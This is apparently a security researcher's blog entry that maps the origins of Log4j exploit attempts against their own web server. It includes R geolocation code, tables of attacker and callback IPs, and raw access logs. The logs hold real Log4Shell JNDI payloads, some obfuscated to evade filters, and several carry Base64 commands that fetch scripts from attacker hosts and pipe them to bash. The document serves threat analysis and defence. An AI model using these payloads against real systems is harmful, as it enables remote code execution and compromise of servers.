Traffic Journal ::009:: Log4j Attack Mapping and Raw Logs

Summary

Separating this out into it's own section because I will be constantly updating as more logs come in. For more detailed Log4j analysis please see:

https://bcable.net/analysis-httpd-log4j_obfuscate.html

https://bcable.net/analysis-httpd-log4j_c2circ.html

R Setup

https://bcable.net/x/Rrdap https://bcable.net/x/Rwhois

library(Rrdap)
library(Rwhois)
library(rgeolocate)

https://bcable.net/x/Rproj/shared

source("shared/cleanup_logs.R")
source("shared/country_code_cleanup.R")
source("shared/geoip.R")
source("shared/load_varlog.R")
source("shared/parse_rawsplit.R")
source("shared/themes.R")
source("shared/world_mapper.R")
site_name <- "bcable.net"

Load Data

httpd_data <- load_varlog(".", "log4j_httpd.txt")
httpd_data <- raw_populate(httpd_data)
httpd_data <- cleanup_httpd(httpd_data, geoip=FALSE)
attack_df <- read.csv("attack_ip.csv")
beacon_servers <- read.csv("beacon_servers.csv")

R Mapping

Start with Rrdap, Rwhois, and rgeolocate data.

ret <- geoip(beacon_servers$IP.Address, "country_code")
beacon_servers$rgeolocate <- ret$country_code
ret <- geoip(attack_df$IP.Address, "country_code")
attack_df$rgeolocate <- ret$country_code
attack_rdap_ret <- Rrdap::rdap_query(attack_df$IP.Address)
## [1] "Error (RDAP Query URI: https://rdap-bootstrap.arin.net/bootstrap/ip/163.172.54.124)"
## <simpleError in readLines(curl_con, warn = FALSE): OpenSSL SSL_connect: Connection reset by peer in connection to rdap.db.ripe.net:443 >
attack_df$Rrdap <- Rrdap::rdap_keyextract(attack_rdap_ret, "country")
beacon_rdap_ret <- Rrdap::rdap_query(beacon_servers$IP.Address)
beacon_servers$Rrdap <- Rrdap::rdap_keyextract(beacon_rdap_ret, "country")
attack_whois_ret <- Rwhois::whois_query(attack_df$IP.Address)
attack_df$Rwhois <- Rwhois::whois_keyextract(attack_whois_ret, "country")
beacon_whois_ret <- Rwhois::whois_query(beacon_servers$IP.Address)
beacon_servers$Rwhois <- Rwhois::whois_keyextract(beacon_whois_ret, "country")

Use RDAP data, fill in the games with rgeolocate data, then fall back on WHOIS data.

attack_df$Rwhois <- sub(" # .*", "", attack_df$Rwhois)
attack_df$Rwhois[nchar(attack_df$Rwhois)!=2] <- NA
attack_df$Country.Code <- attack_df$Rrdap
attack_df$Country.Code[is.na(attack_df$Country.Code)] <-
    attack_df$rgeolocate[is.na(attack_df$Country.Code)]
attack_df$Country.Code[is.na(attack_df$Country.Code)] <-
    attack_df$Rwhois[is.na(attack_df$Country.Code)]

beacon_servers$Rwhois <- sub(" # .*", "", beacon_servers$Rwhois)
beacon_servers$Rwhois[nchar(beacon_servers$Rwhois)!=2] <- NA
beacon_servers$Country.Code <- beacon_servers$Rrdap
beacon_servers$Country.Code[is.na(beacon_servers$Country.Code)] <-
    beacon_servers$rgeolocate[is.na(beacon_servers$Country.Code)]
beacon_servers$Country.Code[is.na(beacon_servers$Country.Code)] <-
    beacon_servers$Rwhois[is.na(beacon_servers$Country.Code)]
attack_df
##     Count      IP.Address rgeolocate Rrdap Rwhois Country.Code
## 1       2    1.116.59.211         CN    CN     CN           CN
## 2       5     5.157.38.50         SE    IS     IS           IS
## 3       4  15.236.146.246         US  <NA>     US           US
## 4       1  18.221.182.245         US  <NA>     US           US
## 5       2     34.74.41.34         US  <NA>     US           US
## 6       2   34.80.118.173         US  <NA>     US           US
## 7       2  36.138.125.108         CN    CN     CN           CN
## 8       1     45.137.21.9       <NA>    NL     NL           NL
## 9       5  45.146.164.160       <NA>    RU     NL           RU
## 10      2  45.146.165.168       <NA>    RU     NL           RU
## 11      9  45.155.205.233       <NA>    RU     NL           RU
## 12      1     45.56.80.11         US  <NA>     US           US
## 13      1     45.83.64.35       <NA>    DE     NL           DE
## 14      1     45.83.65.44       <NA>    DE     NL           DE
## 15      1     45.83.66.20       <NA>    DE     NL           DE
## 16      1     45.83.66.82       <NA>    DE     NL           DE
## 17      2  47.241.208.155         US  <NA>     US           US
## 18      1    51.105.55.17         GB    GB     GB           GB
## 19      2     62.76.41.46         RU    RU     RU           RU
## 20      1   66.249.66.198         US  <NA>     US           US
## 21      1    66.249.66.30         US  <NA>     US           US
## 22      1   68.183.54.220         US  <NA>     US           US
## 23      4    69.49.235.93         US  <NA>     US           US
## 24      3  95.173.156.193         RU    RU     RU           RU
## 25     44  95.214.235.219       <NA>    UA     UA           UA
## 26      3     98.0.242.10         US  <NA>     US           US
## 27      2   107.170.69.93         US  <NA>     US           US
## 28      1  107.189.29.181         US  <NA>     US           US
## 29      2  107.77.106.122         US  <NA>     US           US
## 30      2  107.77.106.132         US  <NA>     US           US
## 31      2   107.77.106.17         US  <NA>     US           US
## 32      2   107.77.106.23         US  <NA>     US           US
## 33      2   107.77.106.25         US  <NA>     US           US
## 34      2   107.77.106.35         US  <NA>     US           US
## 35      2   107.77.106.58         US  <NA>     US           US
## 36      2   107.77.106.77         US  <NA>     US           US
## 37      2   107.77.106.81         US  <NA>     US           US
## 38      2  107.77.223.116         US  <NA>     US           US
## 39      2  107.77.223.226         US  <NA>     US           US
## 40      2   107.77.223.53         US  <NA>     US           US
## 41      2  107.77.224.150         US  <NA>     US           US
## 42      2  107.77.224.190         US  <NA>     US           US
## 43      2    107.77.224.5         US  <NA>     US           US
## 44      2   107.77.224.51         US  <NA>     US           US
## 45      2   107.77.224.99         US  <NA>     US           US
## 46      4  107.77.225.225         US  <NA>     US           US
## 47      2  107.77.226.118         US  <NA>     US           US
## 48      2  107.77.226.123         US  <NA>     US           US
## 49      2   107.77.226.14         US  <NA>     US           US
## 50      2  107.77.226.150         US  <NA>     US           US
## 51      2  107.77.226.152         US  <NA>     US           US
## 52      2  107.77.226.231         US  <NA>     US           US
## 53      2    107.77.226.8         US  <NA>     US           US
## 54      2   107.77.226.82         US  <NA>     US           US
## 55      2    107.77.226.9         US  <NA>     US           US
## 56      2   107.77.70.119         US  <NA>     US           US
## 57      2   107.77.70.124         US  <NA>     US           US
## 58      2   107.77.70.128         US  <NA>     US           US
## 59      2   107.77.76.115         US  <NA>     US           US
## 60      2    107.77.76.17         US  <NA>     US           US
## 61      2    107.77.76.34         US  <NA>     US           US
## 62      2    107.77.76.77         US  <NA>     US           US
## 63      2    107.77.76.94         US  <NA>     US           US
## 64      2  109.237.96.124         RU    GB     GB           GB
## 65      2    121.4.56.143         CN    CN     CN           CN
## 66      2   128.90.61.199         SA  <NA>     US           SA
## 67      3  137.184.104.73         US  <NA>     US           US
## 68      2 137.184.218.211         US  <NA>     US           US
## 69      2 138.197.193.220         US  <NA>     US           US
## 70      5   138.197.72.76         US  <NA>     US           US
## 71      3   139.59.70.139         IN    IN     AU           IN
## 72      1  143.198.71.190         US  <NA>     US           US
## 73      1 143.244.156.104         US  <NA>     US           US
## 74      1   144.21.52.153         US    US     NL           US
## 75      1  147.182.202.30         US  <NA>     US           US
## 76      4   150.158.95.54         BE    CN     CN           CN
## 77      1 157.245.108.125         US  <NA>     US           US
## 78      1 159.223.171.171         US  <NA>     US           US
## 79      5 162.241.114.189         US  <NA>     US           US
## 80      2  163.172.54.124         FR  <NA>     AU           FR
## 81      2   164.52.53.163         HK    HK     AU           HK
## 82      1  164.90.239.160         US  <NA>     US           US
## 83      2 165.232.155.141         US  <NA>     US           US
## 84      4 166.137.252.110         US  <NA>     US           US
## 85      3  167.172.44.255         GB    US     NL           US
## 86      2   167.71.13.196         US  <NA>     US           US
## 87      3   167.71.175.10         US  <NA>     US           US
## 88      6  170.210.45.163         AR  <NA>     UY           AR
## 89      1   171.25.193.77         SE    SE     AU           SE
## 90      1   172.104.152.7         DE  <NA>     US           DE
## 91      1  172.111.36.142         US  <NA>     CA           US
## 92      4 178.176.202.121         RU    RU     RU           RU
## 93      5 178.176.203.190         RU    RU     RU           RU
## 94      2 185.184.152.140         GB    GB     GB           GB
## 95      1 185.220.101.156         DE    US     US           US
## 96      1 185.220.101.191         DE    US     US           US
## 97      2  185.220.101.23         DE    DE     DE           DE
## 98      1   191.232.38.25         BR    BR   <NA>           BR
## 99      5  194.163.179.92         DE    DE     DE           DE
## 100     1  194.233.164.95         DE    GB     GB           GB
## 101     3   194.48.199.78         AT    GB     GB           GB
## 102    60  195.54.160.149       <NA>    RU     RU           RU
## 103     2  199.127.60.104         US  <NA>     US           US
## 104     1  199.195.250.77         US  <NA>     US           US
## 105     2 207.244.248.240         US  <NA>     US           US
## 106     1   209.141.47.28         US  <NA>     US           US
## 107     2  211.154.194.21         CN    CN     CN           CN
beacon_servers
##    Count      IP.Address rgeolocate Rrdap Rwhois Country.Code
## 1      5    2.58.149.206       <NA>    NL     NL           NL
## 2      2    5.181.80.103       <NA>    BG     BG           BG
## 3      1   13.78.223.142         US  <NA>     US           US
## 4     13   31.131.16.127         UA    UA     UA           UA
## 5      2     45.12.32.14       <NA>    NL     NL           NL
## 6      1  45.130.229.168       <NA>    SG     NL           SG
## 7      1     45.137.21.9       <NA>    NL     NL           NL
## 8      1  45.139.100.173       <NA>    IR     NL           IR
## 9      5  45.146.164.160       <NA>    RU     NL           RU
## 10     2  45.146.165.168       <NA>    RU     NL           RU
## 11     9  45.155.205.233       <NA>    RU     NL           RU
## 12     3   45.83.193.150       <NA>    NL     NL           NL
## 13     4      45.83.64.1       <NA>    DE     NL           DE
## 14     1    50.116.41.48         US  <NA>     US           US
## 15     1    51.79.240.74         GB  <NA>     EU           GB
## 16     3  103.104.73.155       <NA>    IN     IN           IN
## 17     1 107.181.187.184         US  <NA>     US           US
## 18    10  121.140.99.236         KR    KR     KR           KR
## 19     2   128.90.61.199         SA  <NA>     US           SA
## 20     1  135.148.130.60         US  <NA>     US           US
## 21     2 135.148.132.224         US  <NA>     US           US
## 22     2   137.184.40.48         US  <NA>     US           US
## 23     6  142.93.172.227         CA  <NA>     US           CA
## 24     1  143.198.109.43         US  <NA>     US           US
## 25     4    159.223.5.30         US  <NA>     US           US
## 26     9  162.241.127.99         US  <NA>     US           US
## 27     1    162.55.90.26         US    DE     NL           DE
## 28     3  167.172.44.255         GB    US     NL           US
## 29     1   167.71.13.196         US  <NA>     US           US
## 30     1   167.99.32.139         US  <NA>     US           US
## 31     1   172.104.152.7         DE  <NA>     US           DE
## 32     1  179.43.175.101         CH  <NA>     PA           CH
## 33    16   185.246.87.50       <NA>    FR     FR           FR
## 34     1  191.232.194.71         BR    BR   <NA>           BR
## 35     1   192.3.194.202         US  <NA>     US           US
## 36     1    193.3.19.159         DK    RU     RU           RU
## 37     4  194.40.243.149       <NA>    NL     NL           NL
## 38    60  195.54.160.149       <NA>    RU     RU           RU
## 39     1 205.185.115.217         US  <NA>     US           US
log4j <- rep(attack_df$Country.Code, attack_df$Count)
g <- world_mapper(country_code_cleanup(log4j))
g <- g + labs(
    title=paste0(site_name,
        ": Log4j Exploit Attempts (Attack Servers)", collapse=""
    ), fill="Attempts", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + theme_worldfont()
g

plot of chunk geomapping_log4j_attack

log4j <- rep(beacon_servers$Country.Code, beacon_servers$Count)
g <- world_mapper(country_code_cleanup(log4j))
g <- g + labs(
    title=paste0(site_name,
        ": Log4j Exploit Callbacks (Beacon Servers)", collapse=""
    ), fill="Attempts", x="", y=""
)
g <- g + scale_fill_continuous(low="#300000", high="#E00000", guide="colorbar")
g <- g + theme_worldfont()
g

plot of chunk geomapping_log4j_beacon

Graphing Attacks by Time

httpd_data$Date <- as.POSIXct(httpd_data$Date)
g <- ggplot(httpd_data, aes(x=Date))
g <- g + labs(x="", y="Attacks", title=paste0(
    c(site_name, ": Log4j Attack Attempts"),
    collapse=""
))
g <- g + geom_histogram(bins=50)
g <- g + theme_bw() %+replace% theme_fontfix()
g

plot of chunk httpd_time

Raw Logs

Because of the nature of the string bypasses, the best generic Bash command I could come up with while filtering for some other attacks in my logs was the following:

grep -shE "\\$.*j.*n.*d.*i" ssl_access_log-20211* access_log-20211* ssl_access_log-202[2-9]* access_log-202[2-9]* access_log ssl_access_log | grep -v "new%20java" | grep -v "\$(wget"

This produced the following raw logs up until approximately “Sun Jan 23 10:29:17 PM CST 2022”.

171.25.193.77 - - [10/Dec/2021:12:35:50 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://298ae5ae41e3.bingsearchlib.com:39356/a}"
45.155.205.233 - - [10/Dec/2021:13:08:43 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:13:08:44 +0000] "GET / HTTP/1.1" 200 5382 "http://50.116.41.48:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:14:29:22 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
45.155.205.233 - - [10/Dec/2021:18:04:08 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:18:04:08 +0000] "GET / HTTP/1.1" 200 5382 "http://50.116.41.48:80/" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [10/Dec/2021:18:54:27 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
167.71.13.196 - - [10/Dec/2021:21:51:23 +0000] "GET /$%7Bjndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b%7D?${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b}=${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b} HTTP/1.1" 404 253 "-" "${jndi:ldaps://cae70be.probe001.log4j.leakix.net:8443/b}"
45.137.21.9 - - [11/Dec/2021:02:50:35 +0000] "POST / HTTP/1.1" 302 203 "-" "${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}"
191.232.38.25 - - [11/Dec/2021:10:25:55 +0000] "GET /${jndi:ldap://45.130.229.168:1389/Exploit} HTTP/1.1" 404 239 "-" "curl/7.58.0"
185.220.101.156 - - [11/Dec/2021:13:51:31 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://205.185.115.217:47324/a}"
137.184.104.73 - - [11/Dec/2021:17:14:09 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
137.184.104.73 - - [11/Dec/2021:17:14:09 +0000] "GET / HTTP/1.1" 200 5382 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
137.184.104.73 - - [11/Dec/2021:17:14:10 +0000] "GET /favicon.ico HTTP/1.1" 200 39662 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}"
138.197.72.76 - - [11/Dec/2021:17:47:10 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
138.197.72.76 - - [11/Dec/2021:19:24:39 +0000] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 267 "-" "Kryptos Logic Telltale"
194.48.199.78 - - [11/Dec/2021:20:51:19 +0000] "GET /?x=${jndi:ldap://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhgr.interactsh.com/a} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhge.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qg2lspu892jo716f40cg4tyiyy4mhgg.interactsh.com}"
138.197.72.76 - - [11/Dec/2021:23:47:38 +0000] "GET / HTTP/1.1" 302 203 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
138.197.72.76 - - [12/Dec/2021:01:05:22 +0000] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 302 276 "-" "Kryptos Logic Telltale"
138.197.72.76 - - [12/Dec/2021:01:05:22 +0000] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 265 "http://50.116.41.48/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
45.155.205.233 - - [12/Dec/2021:04:55:06 +0000] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [12/Dec/2021:04:55:07 +0000] "GET /?x=$%7bjndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
45.155.205.233 - - [12/Dec/2021:05:44:24 +0000] "GET /?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MC4xMTYuNDEuNDg6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzUwLjExNi40MS40ODo0NDMpfGJhc2g=}"
51.105.55.17 - - [12/Dec/2021:17:36:45 +0000] "GET /$%7Bjndi:ldap://45.83.193.150:1389/Exploit%7D HTTP/1.1" 404 238 "-" "Mozilla/5.0 zgrab/0.x"
45.83.64.35 - - [13/Dec/2021:02:01:59 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-https443%7D HTTP/1.1" 400 226 "${jndi:dns://45.83.64.1/securityscan-https443}" "${jndi:dns://45.83.64.1/securityscan-https443}"
45.146.164.160 - - [13/Dec/2021:02:48:45 +0000] "GET / HTTP/1.1" 200 96 "-" "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//45.146.164.160:8081/w}"
45.83.65.44 - - [13/Dec/2021:03:58:16 +0000] "GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 302 252 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}"
138.197.193.220 - - [13/Dec/2021:04:41:07 +0000] "GET / HTTP/1.1" 200 96 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
138.197.193.220 - - [13/Dec/2021:04:41:07 +0000] "GET /favicon.ico HTTP/1.1" 200 39662 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}"
195.54.160.149 - - [13/Dec/2021:04:57:52 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
195.54.160.149 - - [13/Dec/2021:04:57:52 +0000] "GET /?x=$%7bjndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo%7d HTTP/1.1" 200 5382 "http://50.116.41.48:80/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
167.172.44.255 - - [13/Dec/2021:16:59:57 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}"
167.172.44.255 - - [13/Dec/2021:17:37:52 +0000] "GET / HTTP/1.0" 301 225 "-" "borchuk/3.1 ${jndi:ldap://167.172.44.255:389/LegitimateJavaClass}"
45.146.164.160 - - [13/Dec/2021:20:11:53 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${upper:d}${lower:a}${upper:p}://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:53 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:j}${lower:n}${lower:d}i:l${lower:d}${lower:a}p://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${${lower:${lower:jndi}}:ld${lower:ap}://45.146.164.160:1389/t}"
45.146.164.160 - - [13/Dec/2021:20:11:54 +0000] "GET / HTTP/1.1" 200 96 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}"
194.48.199.78 - - [13/Dec/2021:21:45:55 +0000] "GET /?x=${jndi:ldap://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q9o.interact.sh/a} HTTP/1.1" 200 96 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q9w.interact.sh}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rr05cpu892m69lgpo0cg5hygobm6q91.interact.sh}"
195.54.160.149 - - [14/Dec/2021:01:36:08 +0000] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo} HTTP/1.1" 302 399 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC81MC4xMTYuNDEuNDg6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNTAuMTE2LjQxLjQ4OjgwKXxiYXNo}"
